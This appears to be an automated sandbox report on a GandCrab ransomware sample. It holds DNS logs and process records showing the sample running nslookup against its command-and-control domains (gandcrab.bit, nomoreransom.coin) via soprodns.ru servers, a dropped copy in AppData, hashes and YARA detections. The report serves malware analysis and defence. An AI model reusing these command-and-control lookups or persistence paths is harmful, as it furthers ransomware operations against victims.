Aug 31, 2022 23:50:17.487525940 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:17.507570982 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.533308029 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:18.916414976 CEST	8.8.8.8	192.168.2.7	0x5a96	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.954654932 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:18.974977016 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.994760036 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:19.012873888 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.031758070 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:20.563419104 CEST	8.8.8.8	192.168.2.7	0x654d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.595380068 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:20.615622997 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.633987904 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:20.654202938 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.672302961 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:23.034744024 CEST	8.8.8.8	192.168.2.7	0xb093	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.058167934 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:23.078299999 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.096414089 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:23.114574909 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.134742975 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.436777115 CEST	8.8.8.8	192.168.2.7	0x3993	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.464018106 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.482281923 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.502979040 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.521646976 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.544363976 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:26.947271109 CEST	8.8.8.8	192.168.2.7	0x6f26	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:26.987024069 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:27.015486002 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.053275108 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.071413040 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:31.172678947 CEST	8.8.8.8	192.168.2.7	0xc2cb	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.836168051 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:31.860229969 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.927282095 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:31.948879957 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.968821049 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:36.938282013 CEST	8.8.8.8	192.168.2.7	0x4ac2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:36.964608908 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:36.973332882 CEST	8.8.8.8	192.168.2.7	0x4ac2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:36.985584021 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.003935099 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:37.036745071 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.055305004 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:38.477780104 CEST	8.8.8.8	192.168.2.7	0x4ac2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.951469898 CEST	8.8.8.8	192.168.2.7	0x386b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.980972052 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:39.002156019 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:39.022454023 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:39.042603016 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:39.062616110 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:40.345277071 CEST	8.8.8.8	192.168.2.7	0x325b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.414843082 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:40.433434963 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.453635931 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:40.473654032 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.493432045 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:41.813671112 CEST	8.8.8.8	192.168.2.7	0xb5	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.843774080 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:41.863992929 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.884527922 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:41.903028011 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.922991037 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:43.720691919 CEST	8.8.8.8	192.168.2.7	0xaf65	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.746124983 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:43.766308069 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.786328077 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:43.804389954 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.824862003 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:46.606601000 CEST	8.8.8.8	192.168.2.7	0x79c7	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.633125067 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:46.655035973 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.676173925 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:46.702325106 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.724997044 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:47.913981915 CEST	8.8.8.8	192.168.2.7	0xfa2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.938807011 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:47.961014032 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.982100964 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:48.002609015 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:48.020875931 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:48.598846912 CEST	8.8.8.8	192.168.2.7	0x79c7	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.658869028 CEST	8.8.8.8	192.168.2.7	0xe83	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.685262918 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:49.703661919 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.723515987 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:49.746051073 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.766846895 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:50.874103069 CEST	8.8.8.8	192.168.2.7	0x3be0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.899250031 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:50.919481993 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.937942982 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:50.958199978 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.978470087 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: O8ZHhytWhn.exePID: 5900, Parent PID: 5348

General

Target ID:	0
Start time:	23:48:39
Start date:	31/08/2022
Path:	C:\Users\user\Desktop\O8ZHhytWhn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\O8ZHhytWhn.exe"
Imagebase:	0xf1d0000
File size:	71168 bytes
MD5 hash:	B39FEBF7440B58A6CD15AE9F01916F98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.248593701.000000000F1E2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.248569401.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 3600, Parent PID: 5900

General

Target ID:	3
Start time:	23:48:48
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3116, Parent PID: 3600

General

Target ID:	4
Start time:	23:48:48
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5496, Parent PID: 5900

General

Target ID:	5
Start time:	23:48:50
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5928, Parent PID: 5496

General

Target ID:	6
Start time:	23:48:50
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 3220, Parent PID: 5900

General

Target ID:	7
Start time:	23:48:52
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5184, Parent PID: 3220

General

Target ID:	8
Start time:	23:48:52
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wjaoab.exePID: 5444, Parent PID: 3320

General

Target ID:	9
Start time:	23:48:56
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"
Imagebase:	0xfbc0000
File size:	71168 bytes
MD5 hash:	A1E6F4D9E1AF5740E07B86A42C6C430B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000009.00000000.289875664.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000000.289867124.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4404, Parent PID: 5900

General

Target ID:	10
Start time:	23:48:58
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5708, Parent PID: 4404

General

Target ID:	13
Start time:	23:48:59
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5224, Parent PID: 5900

General

Target ID:	16
Start time:	23:49:02
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5756, Parent PID: 5224

General

Target ID:	18
Start time:	23:49:02
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4508, Parent PID: 5900

General

Target ID:	21
Start time:	23:49:04
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1352, Parent PID: 4508

General

Target ID:	22
Start time:	23:49:05
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5732, Parent PID: 5900

General

Target ID:	23
Start time:	23:49:06
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2980, Parent PID: 5732

General

Target ID:	24
Start time:	23:49:07
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wjaoab.exePID: 2888, Parent PID: 3320

General

Target ID:	25
Start time:	23:49:07
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"
Imagebase:	0xfbc0000
File size:	71168 bytes
MD5 hash:	A1E6F4D9E1AF5740E07B86A42C6C430B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000000.308682011.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000000.308674547.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4540, Parent PID: 5900

General

Target ID:	26
Start time:	23:49:09
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5756, Parent PID: 4540

General

Target ID:	27
Start time:	23:49:09
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6132, Parent PID: 5900

General

Target ID:	28
Start time:	23:49:11
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns2.soprodns.ru
Imagebase:	0x7ff6ef7a0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5376, Parent PID: 6132

General

Target ID:	30
Start time:	23:49:12
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5896, Parent PID: 5900

General

Target ID:	31
Start time:	23:49:14
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
